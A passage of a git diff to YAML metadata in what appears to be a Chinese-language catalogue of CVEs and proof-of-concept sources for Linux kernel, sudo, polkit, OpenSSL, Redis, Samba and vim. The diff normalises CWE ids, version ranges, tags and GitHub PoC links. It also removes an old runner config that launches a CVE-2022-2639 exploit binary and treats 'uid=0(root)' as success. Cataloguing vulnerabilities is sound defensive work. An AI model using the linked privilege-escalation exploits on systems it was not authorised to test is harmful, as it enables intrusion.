CVE-2022-25265 cwe-id: CWE-913 - cnvd-id: none - kve-id: none + cnvd-id: None + kve-id: None tags: Linux kernel, 内存损坏 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml index 2c62a5ce..4018b6f4 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml @@ -14,5 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-25636 - cnvd-id: CNNVD-202202-1743 - tags: 堆越界,权限提升,cve2022 + cwe-id: CWE-269 + cnvd-id: None + kve-id: None + tags: 堆越界, 权限提升, cve2022 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml index d8579295..271dcfba 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml @@ -25,5 +25,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 6.7 cve-id: CVE-2022-2586 - cnvd-id: NONE + cwe-id: None + cnvd-id: None + kve-id: None tags: netfilter, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml index d5584e0f..6286b953 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml @@ -15,6 +15,6 @@ info: cvss-score: 7.8 cve-id: CVE-2022-2588 cwe-id: CWE-416 - cnvd-id: - kve-id: - tags: UAF,拒绝服务,权限提升,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: UAF, 拒绝服务, 权限提升, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml deleted file mode 100644 index 1f1fc84d..00000000 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: CVE-2022-2602 -source: https://seclists.org/oss-sec/2022/q4/57 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high - description: | - io_uring UAF, Unix SCM garbage collection - scope-of-influence: - Linux kernel < 5.10.149-1 - reference: - - https://ubuntu.com/security/CVE-2022-2602 - classification: - cvss-metrics: CVSS:3.1 - cvss-score: 漏洞评分 - cve-id: CVE-2022-2602 - cwe-id: None - cnvd-id: None - kve-id: None - tags: cve2022,UAF \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml index 01b0e4d7..74482ef6 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml @@ -1,48 +1,20 @@ -FormatVer: 20220411 -Id: CVE-2022-2639 -Belong: kernel -PocHazardLevel: low -Source: https://github.com/avboy1337/CVE-2022-2639-PipeVersion -SiteInfo: - Name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 - Severity: high - Description: +id: CVE-2022-2639 +source: https://github.com/avboy1337/CVE-2022-2639-PipeVersion +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 + severity: high + description: 由于 openvswitch模块中reserve_sfa_size()函数在使用过程中存在缺陷,导致本地经过身份认证的攻击者可以利用漏洞提升至root权限 - ScopeOfInfluence: - kernel(>=3.13 && <5.18) - References: + scopeOfInfluence: + 3.13 ≤ Linux-Kernel < 5.18 + references: - https://nvd.nist.gov/vuln/detail/CVE-2022-2639 - https://github.com/torvalds/linux/commit/cefa91b2332d7009bc0be5d951d6cbbf349f90f8 - SiteClassification: - CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - CvssScore: 7.8 - CveId: CVE-2022-2639 - CweId: None - CnvdId: None - KveId: None - Tags: - - ve2022 - - 权限提升 -SiteRequests: - Implement: - ImArray: - - Exec : "CVE-2022-2639_x86_64" - Args : - ExpireTime: 30 #second - - # < input - # > output - # . wait - # ? condition - # : content - # - #组合起来 - # >. 等待直到输出 - # << 输入字符 - # >?判断条件 - Inter: - - ">.:infinitely ..." #等待输出'infinitely ...' - - "<<:id\n" #输入'id\n' - - ">.:\n" #等待输出'\n' - - ">?:uid=0(root)" #判断输出为'uid=0(root)'为成功 - Condition: None + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-2639 + cwe-id: CWE-171, CWE-787, CWE-192 + cnvd-id: None + kve-id: None + tags: cve2022, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml index e9c89f4b..cc94bd93 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml @@ -6,7 +6,7 @@ info: description: | Linux kernel 5.16.15之前版本存在安全漏洞,该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。 scope-of-influence: - ~ linux kernel 5.17-rc5 + linux kernel < 5.17-rc5 reference: - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15 - https://www.debian.org/security/2022/dsa-5173 @@ -15,4 +15,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-27666 - tags: 缓冲区溢出,权限提升,cve2022 + cwe-id: CWE-787 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出, 权限提升, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml index 611fb2f1..1f8c0acb 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml @@ -14,5 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-32250 - cnvd-id: CNNVD-202206-407 - tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022 + cwe-id: CWE-416 + cnvd-id: None + kve-id: None + tags: Linux Kernel, cve2022 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml index 17920579..e38f5778 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml @@ -6,7 +6,7 @@ info: description: | Linux kernel 5.18.9版本及之前版本存在安全漏洞,该漏洞源于。本地攻击者利用该漏洞使用 nft_set_elem_init 中的类型混淆错误(导致缓冲区溢出)来提升权限。 scope-of-influence: - Linux kernel(>=5.8.0 && <=5.18.9) + 5.8.0 ≤ Linux kernel ≤ 5.18.9 reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34918 - https://nvd.nist.gov/vuln/detail/CVE-2022-34918 diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml similarity index 86% rename from cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml rename to cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml index eb773fd6..f915cfe6 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml @@ -1,18 +1,21 @@ -id: CVE-2022-36946 -source: https://github.com/Pwnzer0tt1/CVE-2022-36946 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 - description: | - Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 - scope-of-influence: - 5.18.14 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 - - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2022-36946 - tags: 拒绝服务,cve2022 \ No newline at end of file +id: CVE-2022-36946 +source: https://github.com/Pwnzer0tt1/CVE-2022-36946 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: High + description: | + Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 + scope-of-influence: + Linux-Kernel = 5.18.14 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2022-36946 + cwe-id: None + cnvd-id: None + kve-id: None + tags: 拒绝服务, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml index e5594093..a7ecbb14 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml @@ -6,11 +6,11 @@ info: description: | 在5.19.10之前的Linux内核中的drivers/media/dvb-core/dmxdev.c中,存在由refcount竞争导致的释放后使用,影响dvb_demux_open和dvb_dmxdev_release。 scope-of-influence: - Linux内核5.19.10之前的所有版本 + Linux-Kernel < 5.19.10 reference: - https://nvd.nist.gov/vuln/detail/cve-2022-41218 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H cvss-score: 5.5 cve-id: CVE-2022-41218 cwe-id: CWE-416 diff --git a/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml b/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml index 0779d866..b4a6237a 100644 --- a/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml +++ b/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml @@ -2,17 +2,18 @@ id: CVE-2023-0045 source: https://github.com/es0j/CVE-2023-0045 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 超危 + severity: High description: Linux kernel存在安全漏洞,该漏洞源于绕过Spectre-BTI用户空间缓解措施。基于linux操作系统的Intel、AMD和 Arm 等现代处理器,被发现存在一个漏洞,攻击者可以绕过现有硬件防护缓解措施,实施Spectre BTI推测执行攻击,从而访问内存数据,可能引起信息泄漏。用于推测控制的prctl系统调用的当前实现未能保护用户免受在缓解之前执行的攻击者的攻击。seccomp缓解在此场景中也失败了。 scope-of-influence: - 5.5~5.15 + 5.5 ≤ Linux-Kernel ≤ 5.15 reference: - - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2023-0179 - - https://docs.kernel.org/userspace-api/spec_ctrl.html - - https://elixir.bootlin.com/linux/v5.15.56/source/arch/x86/kernel/cpu/bugs.c#L1467 + - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2023-0045 + - https://nvd.nist.gov/vuln/detail/CVE-2023-0045 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2023-0045 - cwe-id: - tags: 推测攻击,信息泄露,cve2023 \ No newline at end of file + cwe-id: CWE-610 + cnvd-id: None + kve-id: None + tags: 推测攻击, 信息泄露, cve2023 \ No newline at end of file diff --git a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml index 74ca113b..33387ea2 100644 --- a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml +++ b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml @@ -19,5 +19,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2023-0179 - cnvd-id: NONE - tags: 缓冲区溢出,cve2023 \ No newline at end of file + cwe-id: CWE-190 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出, cve2023 \ No newline at end of file diff --git a/cve/openssl/2016/yaml/CVE-2016-2107.yaml b/cve/openssl/2016/yaml/CVE-2016-2107.yaml index 0d605e24..b231edef 100644 --- a/cve/openssl/2016/yaml/CVE-2016-2107.yaml +++ b/cve/openssl/2016/yaml/CVE-2016-2107.yaml @@ -1,6 +1,5 @@ id: CVE-2016-2107 -source: - https://github.com/FiloSottile/CVE-2016-2107 +source: https://github.com/FiloSottile/CVE-2016-2107 info: name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 severity: medium diff --git a/cve/openssl/2021/yaml/CVE-2021-3449.yaml b/cve/openssl/2021/yaml/CVE-2021-3449.yaml index 5e064af3..cd047c80 100644 --- a/cve/openssl/2021/yaml/CVE-2021-3449.yaml +++ b/cve/openssl/2021/yaml/CVE-2021-3449.yaml @@ -1,6 +1,5 @@ id: CVE-2021-3449 -source: - https://github.com/terorie/cve-2021-3449 +source: https://github.com/terorie/cve-2021-3449 info: name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 severity: medium diff --git a/cve/openssl/2022/yaml/CVE-2022-0778.yaml b/cve/openssl/2022/yaml/CVE-2022-0778.yaml index b571f37c..9f209b49 100644 --- a/cve/openssl/2022/yaml/CVE-2022-0778.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-0778.yaml @@ -4,11 +4,12 @@ info: name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 severity: High description: 漏洞出自BN_mod_sqrt()接口函数,它用于计算模平方根,且期望参数p应该是个质数,但是函数内并没有进行检查,这导致内部可能出现无限循环。 - scope-of-influence: Openssl 1.0.2, 1.1.1 和 3.0 版本 + scope-of-influence: + Openssl 1.0.2, 1.1.1 和 3.0 版本 reference: - https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2022-0778 cwe-id: CWE-835 diff --git a/cve/openssl/2022/yaml/CVE-2022-2274.yaml b/cve/openssl/2022/yaml/CVE-2022-2274.yaml index 5e366ebe..973b492c 100644 --- a/cve/openssl/2022/yaml/CVE-2022-2274.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-2274.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-787 cnvd-id: None kve-id: None - tags: 拒绝服务,DoS,cve2022,RCE,远程代码执行 \ No newline at end of file + tags: 拒绝服务, DoS, cve2022, RCE, 远程代码执行 \ No newline at end of file diff --git a/cve/openssl/2022/yaml/CVE-2022-3602.yaml b/cve/openssl/2022/yaml/CVE-2022-3602.yaml index 90d08aba..73bcf175 100644 --- a/cve/openssl/2022/yaml/CVE-2022-3602.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-3602.yaml @@ -24,4 +24,4 @@ info: cwe-id: CWE-120 cnvd-id: None kve-id: None - tags: 缓存溢出,BOF,拒绝服务,DoS,cve2022,RCE,远程代码执行 \ No newline at end of file + tags: 缓存溢出, BOF, 拒绝服务, DoS, cve2022, RCE, 远程代码执行 \ No newline at end of file diff --git a/cve/openssl/2023/yaml/CVE-2023-25136.yaml b/cve/openssl/2023/yaml/CVE-2023-25136.yaml index 6879369c..ef5b2337 100644 --- a/cve/openssl/2023/yaml/CVE-2023-25136.yaml +++ b/cve/openssl/2023/yaml/CVE-2023-25136.yaml @@ -18,4 +18,4 @@ info: cwe-id: CWE-415 cnvd-id: None kve-id: None - tags: 拒绝服务,DoS \ No newline at end of file + tags: 拒绝服务, DoS \ No newline at end of file diff --git a/cve/polkit/2021/yaml/CVE-2021-3560.yaml b/cve/polkit/2021/yaml/CVE-2021-3560.yaml index d378eb64..e0ad57ec 100644 --- a/cve/polkit/2021/yaml/CVE-2021-3560.yaml +++ b/cve/polkit/2021/yaml/CVE-2021-3560.yaml @@ -6,7 +6,7 @@ info: description: | 发现polkit可能被欺骗,绕过D-Bus请求的凭据检查,将请求者的权限提升到root用户。 scope-of-influence: - 0.105 ≥ policykit ≥ 0.113 + 0.105 ≤ policykit ≤ 0.113 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3560 - https://ubuntu.com/security/CVE-2021-3560 @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-3560 - cwe-id: CWE-754,CWE-863 + cwe-id: CWE-754, CWE-863 cnvd-id: None kve-id: None - tags: cve2021,权限提升 \ No newline at end of file + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/polkit/2021/yaml/CVE-2021-4034.yaml b/cve/polkit/2021/yaml/CVE-2021-4034.yaml index 9322d045..9cbe6b9a 100644 --- a/cve/polkit/2021/yaml/CVE-2021-4034.yaml +++ b/cve/polkit/2021/yaml/CVE-2021-4034.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-4034 - cwe-id: CWE-787,CWE-125 + cwe-id: CWE-787, CWE-125 cnvd-id: None kve-id: None - tags: cve2021,权限提升 \ No newline at end of file + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/python/2022/yaml/CVE-2022-30286.yaml b/cve/python/2022/yaml/CVE-2022-30286.yaml index 613b5007..c76e9e07 100644 --- a/cve/python/2022/yaml/CVE-2022-30286.yaml +++ b/cve/python/2022/yaml/CVE-2022-30286.yaml @@ -20,5 +20,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: - - Source Codes Read \ No newline at end of file + tags: Source Codes Read \ No newline at end of file diff --git a/cve/python/2022/yaml/CVE-2022-35411.yaml b/cve/python/2022/yaml/CVE-2022-35411.yaml index 3e14c184..3ac53181 100644 --- a/cve/python/2022/yaml/CVE-2022-35411.yaml +++ b/cve/python/2022/yaml/CVE-2022-35411.yaml @@ -18,5 +18,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: - - 远程代码执行 + tags: 远程代码执行 diff --git a/cve/redis/2022/yaml/CVE-2022-0543.yaml b/cve/redis/2022/yaml/CVE-2022-0543.yaml index 7a93478e..15056d48 100644 --- a/cve/redis/2022/yaml/CVE-2022-0543.yaml +++ b/cve/redis/2022/yaml/CVE-2022-0543.yaml @@ -1,6 +1,5 @@ id: CVE-2022-0543 -source: - https://github.com/aodsec/CVE-2022-0543 +source: https://github.com/aodsec/CVE-2022-0543 info: name: Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 severity: critical @@ -20,4 +19,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: cve2022,redis,RCE \ No newline at end of file + tags: cve2022, redis, RCE \ No newline at end of file diff --git a/cve/redis/2022/yaml/CVE-2022-31144.yaml b/cve/redis/2022/yaml/CVE-2022-31144.yaml index 7b5dcafb..13ff43a8 100644 --- a/cve/redis/2022/yaml/CVE-2022-31144.yaml +++ b/cve/redis/2022/yaml/CVE-2022-31144.yaml @@ -1,6 +1,5 @@ id: CVE-2022-31144 -source: - https://github.com/SpiralBL0CK/CVE-2022-31144 +source: https://github.com/SpiralBL0CK/CVE-2022-31144 info: name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力. severity: High diff --git a/cve/samba/2021/yaml/CVE-2021-44142.yaml b/cve/samba/2021/yaml/CVE-2021-44142.yaml index bcce0569..f6160dc9 100644 --- a/cve/samba/2021/yaml/CVE-2021-44142.yaml +++ b/cve/samba/2021/yaml/CVE-2021-44142.yaml @@ -1,6 +1,5 @@ id: CVE-2021-44142 -source: - https://github.com/horizon3ai/CVE-2021-44142 +source: https://github.com/horizon3ai/CVE-2021-44142 info: name: Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。 severity: high @@ -20,4 +19,4 @@ info: cwe-id: CWE-125,CWE-787 cnvd-id: None kve-id: None - tags: cve2021,samba,RCE \ No newline at end of file + tags: cve2021, samba, RCE \ No newline at end of file diff --git a/cve/sudo/2021/yaml/CVE-2021-3156.yaml b/cve/sudo/2021/yaml/CVE-2021-3156.yaml index 5782b430..760104cc 100644 --- a/cve/sudo/2021/yaml/CVE-2021-3156.yaml +++ b/cve/sudo/2021/yaml/CVE-2021-3156.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-193 cnvd-id: None kve-id: None - tags: 堆缓冲区溢出漏洞,cve2021,权限提升 \ No newline at end of file + tags: 堆缓冲区溢出漏洞, cve2021, 权限提升 \ No newline at end of file diff --git a/cve/sudo/2023/yaml/CVE-2023-22809.yaml b/cve/sudo/2023/yaml/CVE-2023-22809.yaml index 8fad7320..66b6045a 100644 --- a/cve/sudo/2023/yaml/CVE-2023-22809.yaml +++ b/cve/sudo/2023/yaml/CVE-2023-22809.yaml @@ -1,20 +1,19 @@ id: CVE-2023-22809 source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc info: - name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 - severity: high - description: - Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 - scope-of-influence: - sudo@[1.8.0, 1.9.12p2) - references: - - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2023-22809 - cwe-id: CWE-269 - cnvd-id: None - kve-id: None - tags: - - 特权管理不当 \ No newline at end of file + name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 + severity: high + description: + Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 + scope-of-influence: + sudo@[1.8.0, 1.9.12p2) + references: + - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-22809 + cwe-id: CWE-269 + cnvd-id: None + kve-id: None + tags: 特权管理不当 \ No newline at end of file diff --git a/cve/vim/2021/yaml/CVE-2021-3778.yaml b/cve/vim/2021/yaml/CVE-2021-3778.yaml index a009ea6b..e99dcced 100644 --- a/cve/vim/2021/yaml/CVE-2021-3778.yaml +++ b/cve/vim/2021/yaml/CVE-2021-3778.yaml @@ -2,8 +2,7 @@ id: CVE-2021-3778 source: https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/ info: name: vim: Heap-based Buffer Overflow in ex_retab() - severity: - HIGH + severity: HIGH description: | vim容易受到基于堆的缓冲区溢出的攻击 scope-of-influence: diff --git a/cve/vim/2022/yaml/CVE-2022-0351.yaml b/cve/vim/2022/yaml/CVE-2022-0351.yaml index 151afb15..a7dab599 100644 --- a/cve/vim/2022/yaml/CVE-2022-0351.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0351.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0351 - cwe-id: CWE-119,CWE-786 + cwe-id: CWE-119, CWE-786 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误,拒绝服务 \ No newline at end of file + tags: cve2022, 缓冲区错误, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0359.yaml b/cve/vim/2022/yaml/CVE-2022-0359.yaml index 63ba2110..2bab72a5 100644 --- a/cve/vim/2022/yaml/CVE-2022-0359.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0359.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0359 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: 缓冲区溢出,cve2022 \ No newline at end of file + tags: 缓冲区溢出, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0413.yaml b/cve/vim/2022/yaml/CVE-2022-0413.yaml index 6768e9a9..e4ba32a1 100644 --- a/cve/vim/2022/yaml/CVE-2022-0413.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0413.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-416 cnvd-id: None kve-id: None - tags: cve2022,资源管理错误,拒绝服务 \ No newline at end of file + tags: cve2022, 资源管理错误, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0417.yaml b/cve/vim/2022/yaml/CVE-2022-0417.yaml index 30adb1b7..ea15ffe1 100644 --- a/cve/vim/2022/yaml/CVE-2022-0417.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0417.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0417 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: 崩溃,代码执行,cve2022 \ No newline at end of file + tags: 崩溃, 代码执行, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0572.yaml b/cve/vim/2022/yaml/CVE-2022-0572.yaml index 3c4f1c9e..be2a6387 100644 --- a/cve/vim/2022/yaml/CVE-2022-0572.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0572.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0572 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: 缓冲区错误,cve2022 \ No newline at end of file + tags: 缓冲区错误, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0629.yaml b/cve/vim/2022/yaml/CVE-2022-0629.yaml index 3802cc7d..a06f09e8 100644 --- a/cve/vim/2022/yaml/CVE-2022-0629.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0629.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0629 - cwe-id: CWE-787,CWE-121 + cwe-id: CWE-787, CWE-121 cnvd-id: None kve-id: None - tags: 缓冲区溢出,cve2022 \ No newline at end of file + tags: 缓冲区溢出, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0685.yaml b/cve/vim/2022/yaml/CVE-2022-0685.yaml index b04e2848..3dda6837 100644 --- a/cve/vim/2022/yaml/CVE-2022-0685.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0685.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-823 